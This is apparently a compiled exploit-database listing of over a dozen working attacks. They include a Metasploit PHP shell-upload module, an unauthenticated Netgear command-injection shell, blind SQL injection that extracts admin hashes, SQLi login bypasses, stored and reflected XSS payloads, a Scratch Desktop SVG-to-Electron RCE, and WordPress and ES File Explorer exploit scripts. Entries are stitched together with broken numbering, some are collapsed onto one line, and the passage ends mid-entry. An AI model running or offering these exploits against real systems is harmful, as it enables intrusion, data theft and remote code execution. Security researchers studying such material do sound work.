
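##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lightweight facebook-styled blog authenticated remote code execution',
      'Description'    => %q{
        This module exploits the file upload vulnerability of Lightweight self-hosted
        facebook-styled PHP blog and allows remote code execution. Valid blog
        credentials are required. The PHP payload is prefixed with a PNG header and
        uploaded through ajax.php?action=upload_image under a .php filename; the
        server answers with the stored path, which is then requested to run the payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module
      ],
      'References'     => [
        ['URL', 'https://prodaft.com']
      ],
      'DefaultOptions' => {
        'SSL'      => false,
        'WfsDelay' => 5
      },
      'Platform'       => ['php'],
      'Arch'           => [ARCH_PHP],
      'Targets'        => [
        ['PHP payload', {
          'Platform'       => 'PHP',
          'Arch'           => ARCH_PHP,
          'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
        }]
      ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 19 2018',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'Blog username', 'demo']),
        OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
        # The previous description ("The URI of the arkei gate") was a
        # copy-paste leftover from an unrelated module.
        OptString.new('TARGETURI', [true, 'Base path of the blog', '/'])
      ]
    )
  end

  # Fetches the session cookie and CSRF token from the landing page, then
  # authenticates against ajax.php with the configured credentials.
  #
  # Returns [cookie, token] on success and [nil, nil] on any failure; it never
  # raises on an absent or unexpected response (the old split chain threw
  # NoMethodError when the token marker was missing).
  def login
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    )
    unless res && res.code == 200
      print_error('Could not fetch the landing page' + (res ? " (HTTP #{res.code})" : ' (no response)'))
      return nil, nil
    end

    cookie = res.get_cookies
    # Same extraction as `body.split('":"')[1].split('"')[0]`: the value after
    # the first `":"` up to the next quote, but nil instead of an exception.
    token = res.body[/":"([^"]+)"/, 1]
    if token.nil? || cookie.to_s.empty?
      print_error('Could not extract the CSRF token or session cookie from the landing page')
      return nil, nil
    end
    print_status("Got CSRF token: #{token}")

    print_status('Logging into the blog...')
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'ajax.php'),
      'headers'   => { 'Csrf-Token' => token },
      'cookie'    => cookie,
      # vars_post URL-encodes the values; the hand-built body broke on
      # credentials containing '&' or '='.
      'vars_post' => {
        'action' => 'login',
        'nick'   => datastore['USERNAME'],
        'pass'   => datastore['PASSWORD']
      }
    )
    unless res && res.code == 200
      print_error('Login failed!' + (res ? " Status code #{res.code}" : ' No response'))
      return nil, nil
    end

    json = res.get_json_document
    # The original tested `json.empty? && json['error']`, which can never be
    # true; either an empty document or an explicit error means failure.
    if json.empty? || json['error']
      print_error("Login failed! #{json['error'] || 'empty JSON response'}")
      return nil, nil
    end

    print_good("Successfully logged in with #{datastore['USERNAME']}")
    return cookie, token
  end

  # Uploads the PNG-prefixed PHP payload through the authenticated image upload
  # endpoint and requests the stored path to execute it.
  def exploit
    cookie, token = login
    # Both values are required for the upload; `cookie || token` let a
    # half-failed login continue.
    unless cookie && token
      fail_with(Failure::NoAccess, "#{peer} - Authentication Failed")
    end

    data = Rex::MIME::Message.new
    # Only the leading bytes of a PNG (signature + IHDR/pHYs chunks), decoded
    # from base64, so the body starts with valid image magic.
    png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4')
    # Random name instead of the fixed "mia.php": avoids collisions on re-runs
    # and a static on-disk indicator.
    filename = "#{rand_text_alphanumeric(8)}.php"
    data.add_part(png + payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"#{filename}\"")

    print_status("Uploading shell as #{filename}...")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'ajax.php'),
      'cookie'   => cookie,
      'vars_get' => { 'action' => 'upload_image' },
      'headers'  => { 'Csrf-Token' => token },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
    )
    unless res
      fail_with(Failure::Unreachable, "#{peer} - No response to the upload request")
    end
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed with HTTP #{res.code}")
    end

    json = res.get_json_document
    if json.empty? || !json['path']
      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected JSON response, no 'path' field")
    end
    print_good("Shell uploaded as #{json['path']}")
    print_warning("The uploaded file is not removed automatically; delete #{json['path']} after use")

    # Short timeout: a bind/reverse payload blocks the request, so the GET is
    # not expected to return. Nothing here verifies execution; WfsDelay gives
    # the handler time to pick up the session.
    send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, json['path'])
    }, 3)
    print_status('Payload request sent')
  end
end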
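# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447

import ast
import json
import sys

import requests

# The app's HTTP service listens on TCP 59777 and takes {"command": ...} JSON.
PORT = 59777
TIMEOUT = 15  # seconds; without it a dead host hangs the script forever

CMDS = [
    'listFiles', 'listPics', 'listVideos', 'listAudios', 'listApps',
    'listAppsSystem', 'listAppsPhone', 'listAppsSdcard', 'listAppsAll',
    'getFile', 'getDeviceInfo',
]
LIST_CMDS = CMDS[:9]
HEADER = {"Content-Type": "application/json"}
# Pass `proxies=PROXY` to the requests calls to inspect traffic in Burp.
PROXY = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}

HELP = """Available commands :
   listFiles      : List all Files.
   listPics       : List all Pictures.
   listVideos     : List all videos.
   listAudios     : List all audios.
   listApps       : List Applications installed.
   listAppsSystem : List System apps.
   listAppsPhone  : List Communication related apps.
   listAppsSdcard : List apps on the SDCard.
   listAppsAll    : List all Application.
   getFile        : Download a file.
   getDeviceInfo  : Get device info."""

BANNER = """
==================================================================
|       ES File Explorer Open Port Vulnerability : CVE-2019-6447  |
|       Coded By : Nehal a.k.a PwnerSec                          |
==================================================================
"""


def http_post(url, cmd):
    """POST {"command": cmd} to the service and return the decoded body.

    Strict JSON is tried first; ast.literal_eval() (what the original script
    used) is kept only as a fallback for bodies that are Python-literal-like
    rather than valid JSON.

    Raises requests.RequestException on network errors and ValueError when
    the body can be parsed by neither decoder.
    """
    response = requests.post(url, headers=HEADER, data=json.dumps({"command": cmd}),
                             timeout=TIMEOUT)
    try:
        return json.loads(response.text)
    except ValueError:
        return ast.literal_eval(response.text)


def format_rows(rows, keys):
    """Return 'key : value' lines for every row, with a blank line after each row."""
    lines = []
    for row in rows:
        for key in keys:
            lines.append(f"{key} : {row[key]}")
        lines.append('')
    return lines


def do_listing(url, cmd):
    """Run a list* command and print every entry; keys come from the first entry."""
    rows = http_post(url, cmd)
    keys = list(rows[0].keys()) if rows else []
    for line in format_rows(rows, keys):
        print(line)


def get_file(url, path, out='out.dat'):
    """Download an absolute device path via plain GET and store it as `out`."""
    # startswith() also handles an empty argument, which `path[0]` did not.
    if not path.startswith('/'):
        print("[-] You need to provide full path of the file.")
        sys.exit(1)
    print("[+] Downloading file...")
    response = requests.get(url + path, timeout=TIMEOUT)
    if response.status_code != 200:
        print(f"[-] Server returned HTTP {response.status_code}")
        sys.exit(1)
    with open(out, 'wb') as wf:
        wf.write(response.content)
    print(f"[+] Done. Saved as `{out}`.")


def get_device_info(url, cmd):
    """Print every key of the getDeviceInfo object."""
    response = http_post(url, cmd)
    for key in response:
        print(f"{key} : {response[key]}")


def main():
    if len(sys.argv) < 3:
        print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
        sys.exit(1)

    cmd = sys.argv[1]
    url = 'http://' + sys.argv[2] + ':' + str(PORT)

    if cmd not in CMDS:
        print("[-] WRONG COMMAND!")
        print(HELP)
        sys.exit(1)

    print(BANNER)

    try:
        if cmd in LIST_CMDS:
            do_listing(url, cmd)
        elif cmd == 'getFile':
            if len(sys.argv) != 4:
                print("[+] Include file name to download.")
                sys.exit(1)
            get_file(url, sys.argv[3])
        elif cmd == 'getDeviceInfo':
            get_device_info(url, cmd)
    except requests.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        sys.exit(1)
    except (ValueError, SyntaxError) as exc:
        print(f"[-] Could not decode the response: {exc}")
        sys.exit(1)


if __name__ == "__main__":
    main()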
  3. # Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated) # Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter # Notes: The RCE doesn't need to be authenticated # Date: 26/06/2021 # Exploit Author: Bryan Leong <NobodyAtall> # IoT Device: Netgear WNAP320 Access Point # Version: WNAP320 Access Point Firmware v2.0.3 import requests import sys if(len(sys.argv) != 2): print('Must specify the IP parameter') print("eg: python3 wnap320_v2_0_3.py <IP>") sys.exit(0) host = sys.argv[1] port = 80 cmd = '' while(True): cmd = input('Shell_CMD$ ') #injecting system command part writing the command output to a output file data = { 'macAddress' : '112233445566;' + cmd + ' > ./output #', 'reginfo' : '0', 'writeData' : 'Submit' } url = 'http://' + host + '/boardDataWW.php' response = requests.post(url, data=data) if(response.ok): #read the command output result url = 'http://' + host + '/output' cmdOutput = requests.get(url) print(cmdOutput.text) #remove trace cmd = 'rm ./output' data = { 'macAddress' : '112233445566;' + cmd + ' #', 'reginfo' : '0', 'writeData' : 'Submit' } url = 'http://' + host + '/boardDataWW.php' response = requests.post(url, data=data) else: print('[!] No response from the server.')
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
# Date: 06/05/2021
# Exploit Author: CAPTAIN_HOOK
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: ANY
# CVE : CVE-2021-26078

Description:
The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting (XSS) vulnerability.

*Fixed versions:*
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0

POC:
- The *Story points* custom field, which exists by default in every Jira Server instance, has three possible Search templates (None, number range searcher, number searcher). By default the Search template is either "number range searcher" or "number searcher". If it is set to "number range searcher", the Jira server is vulnerable to XSS from the lowest-privileged user.

For testing: with your ADMIN account, open the Story points custom field and its details to verify that the Search template is set to "number range searcher" (as shown in the images). Then, in another window, logged in as your least-privileged user, submit this as the `jql` parameter of an issue search URL (the JQL is reflected unescaped into the page):

jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22

URL-decoded, the query is: issuetype = Epic AND "Story Points" <= "\"><script>alert(document.cookie)</script>" AND "Story Points" >= "1"

Your XSS will be triggered immediately. Because it is reflected, an attacker must get a logged-in victim to open the crafted URL.

Reference: https://jira.atlassian.com/browse/JRASERVER-72392
  5. # Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration # Author: Dolev Farhi # Date: 2021-05-13 # Vendor Homepage: https://superset.apache.org/ # Version: 1.1.0 # Tested on: Ubuntu import sys import requests import time scheme = 'http' host = '192.168.1.1' port = 8080 # change with your wordlist usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset'] url = '{}://{}:{}'.format(scheme, host, port) login_endpoint = '/login/' session = requests.Session() def get_csrf(): token = None r = session.get(url + login_endpoint, verify=False) for line in r.text.splitlines(): if 'csrf_token' in line: try: token = line.strip().split('"')[-2] except: pass return token csrf_token = get_csrf() if not csrf_token: print('Could not obtain CSRF token, the exploit will likely fail.') sys.exit(1) data = { 'csrf_token':csrf_token, 'username':'', 'password':'abc' } attempts = {} found = False for user in usernames: start = time.time() data['username'] = user r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True) roundtrip = time.time() - start attempts["%.4f" % roundtrip] = user print('[!] Accounts existence probability is sorted from high to low') count = 0 for key in sorted(attempts, reverse=True): count += 1 print("%s. %s (timing: %s)" % (count, attempts[key], key))
  6. # Exploit Title: phpAbook 0.9i - SQL Injection # Date: 2021-06-29 # Vendor Homepage: http://sourceforge.net/projects/phpabook/ # Exploit Author: Said Cortes, Alejandro Perez # Version: v0.9i # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. import requests import argparse import string import sys def exploit(session,host): print("Starting Exploit\nSearching Admin Hash...") passwordhash = '' for i in range(1,33): charset = string.digits + string.ascii_lowercase for letter in charset: burp0_url = f"{host}/index.php" burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"} try: session.post(burp0_url, data=burp0_data, timeout=1) except requests.Timeout: passwordhash += letter continue print("admin:"+passwordhash) if __name__ == "__main__" : session = requests.session() parser = argparse.ArgumentParser() parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True) arg = parser.parse_args() exploit(session,arg.url)
  7. # Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi) # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date 30.06.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /Online_voting_system/admin/ HTTP/1.1 Host: localhost Content-Length: 50 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/Online_voting_system/admin/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a Connection: close UserName=admin&Password=%27+or+%27%27%3D%27&Login= ########### # Payload # ########### UserName=admin Password=' or ''='
  8. # Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) # Date: 06/30/2021 # Exploit Author: Murat DEMIRCI (butterflyhunt3r) # Vendor Homepage: https://www.codester.com/ # Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : http://test.com/PATH/signin # Username : anything # Password : ' or '1'='1
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
# Date: 30-06-2021
# Exploit Author: Barış Yıldızoğlu
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
# Version: 1.0
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
# Description: Almost every field of the "Report Offense" form is stored and later rendered without encoding, so each of them carries a stored XSS.

Request:

POST /Trafic/save-reported.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Trafic/report-offence.php
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
Upgrade-Insecure-Requests: 1

offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload here}&name={Payload here}&address={Payload here}&gender={Payload here}&officer_reporting={Payload here}&offence={Payload here}

# Steps to Reproduce:
[1.] Log in to the system with a valid account (the account used here: username=Torrahclef&pass=yemiyemi); an authenticated session is required, so adjust Content-Length and the PHPSESSID cookie to your own.
[2.] Go to the Report Offense page
[3.] Send the request above with the stored XSS payload in one or more of the fields
[4.] The payload executes whenever the Dashboard and Offense list pages are viewed
# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi
# Date: 01/07/2021
# Exploit Author: Audencia Business SCHOOL
# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/
# Software Link: http://www.vianeos.com/en/octopus/
# Version: > V5
# Tested on: Fedora / Apache2 / MariaDB

Octopus V5 SQLi

The `login_user` parameter of the POST authentication request is vulnerable to a time-based blind SQL injection (unauthenticated, since it is the login form itself). sqlmap output:

```
Parameter: login_user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
```

A vulnerable host delays its response by about 5 seconds for the payload above; compare against a baseline request with the same parameters minus the injection to rule out network latency.
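# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md

'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress.
It gave authenticated attackers the ability to modify arbitrary files, including PHP files.
Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php
write_file_action could overwrite wp-config.php, for example. Alternatively, an attacker could
create an exploit chain to obtain a database dump.
'''

import argparse
import sys

import requests

TIMEOUT = 30

# The original ASCII-art banner did not survive the listing's line collapse;
# a plain one carries the same information.
banner = """
 CVE-2020-35948 - WordPress XCloner 4.2.1 - 4.2.12 RCE (Authenticated)
 by @Hacker5preme
"""

USER_AGENT = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0'
BOUNDARY = '------------------------08425016980d7357'


def parse_args():
    """CLI options; every option is required so a missing one fails early
    instead of producing a 'http://None:None' URL."""
    my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
    my_parser.add_argument('-T', '--IP', type=str, required=True)
    my_parser.add_argument('-P', '--PORT', type=str, required=True)
    my_parser.add_argument('-U', '--PATH', type=str, required=True,
                           help='WordPress base path, e.g. /wordpress/ or /')
    my_parser.add_argument('-u', '--USERNAME', type=str, required=True)
    my_parser.add_argument('-p', '--PASSWORD', type=str, required=True)
    return my_parser.parse_args()


def base_url(ip, port, path):
    """Return http://IP:PORT/<path>/ with exactly one trailing slash.

    The old code concatenated PATH and 'wp-login.php' directly, which only
    worked when PATH ended in '/'.
    """
    base = f"http://{ip}:{port}/"
    path = path.strip('/')
    return base + path + '/' if path else base


def login(session, base, username, password):
    """Authenticate against wp-login.php; return True when WordPress set a
    wordpress_logged_in_* cookie on the session."""
    header = {
        'Host': base.split('/')[2],
        'User-Agent': USER_AGENT,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': base.rstrip('/'),
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    body = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'testcookie': '1',
    }
    session.post(base + 'wp-login.php', headers=header, data=body, timeout=TIMEOUT)
    # Reading auth.headers['Set-Cookie'] raised KeyError when no cookie came
    # back; the jar is the reliable place to look.
    return any(c.name.startswith('wordpress_logged_in') for c in session.cookies)


def build_body(ajax_cmd, boundary=BOUNDARY):
    """Build the multipart body with a single `xcloner_action` field."""
    return ("--" + boundary + "\r\n"
            "Content-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n"
            + ajax_cmd + "\r\n"
            "--" + boundary + "--\r\n")


def main():
    print(banner)
    args = parse_args()
    base = base_url(args.IP, args.PORT, args.PATH)

    print('')
    ajax_cmd = input('[*] Ajax Command to execute: ')

    session = requests.Session()
    print('')
    try:
        if login(session, base, args.USERNAME, args.PASSWORD):
            print('[+] Authentication successful !')
        else:
            print('[-] Authentication failed !')
            sys.exit(1)

        # Previously a hard-coded http://192.168.0.38/wordpress// URL, which
        # ignored the -T/-P/-U options entirely.
        url_exploit = base + "wp-admin/admin-ajax.php?action=restore_backup"
        header = {
            "Accept": "*/*",
            "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
            "Connection": "close",
        }
        exploit = session.post(url_exploit, headers=header, data=build_body(ajax_cmd),
                               timeout=TIMEOUT)
    except requests.RequestException as exc:
        print(f'[-] Request failed: {exc}')
        sys.exit(1)

    print('')
    print(exploit.text)
    print('')


if __name__ == '__main__':
    main()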
  12. # Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated) # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date 30.06.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /Online_voting_system/admin/save_candidate.php HTTP/1.1 Host: localhost Content-Length: 1253 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/Online_voting_system/admin/new_candidate.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a Connection: close ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="user_name" admin ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rfirstname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rlastname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rgender" Male ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="ryear" 1st year ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rmname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rposition" Governor ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="party" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="image"; 
filename="test.php" Content-Type: application/octet-stream <?php echo exec("whoami"); ?> ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="save" ------WebKitFormBoundary4G9QRpniTS7gPVqW-- ######## # Note # ######## Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
  13. # Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) # Date: 07-01-2021 # Exploit Author: Tyler Butler # Vendor Homepage: https://www.akcp.com/ # Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/ # Advisory: https://tbutler.org/2021/06/28/cve-2021-35956 # Version: < SP480-20210624 # CVE: CVE-2021-35956 # Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. 1) Stored Cross-Site Scripting via System Settings POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save 2) Stored Cross-Site Scripting via Email Settings POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: 
http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save 3) Stored Cross-Site Scripting via Sensor Description POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close _WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2 (tested); all versions before 3.17.1 are affected
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE)
< 3.17.1 / scratch-svg-renderer < 0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on the 21st of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1:
https://scratch.mit.edu/discuss/topic/449794/

The vulnerability is exploited by uploading an SVG (*.svg) file WITHOUT the viewBox attribute that embeds a malicious event handler. Example:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>

The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive.

Example of regular cross-site scripting (XSS):

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>

Scratch Desktop runs on Electron, and there the same injection becomes remote code execution (RCE) because the renderer exposes Node's `require()` to page script:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>

The example above launches cmd.exe (Command Prompt) on Windows; it runs with the privileges of the user who opened the project.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/ Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
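# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24146
# CWE: CWE-863, CWE-284
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md

'''
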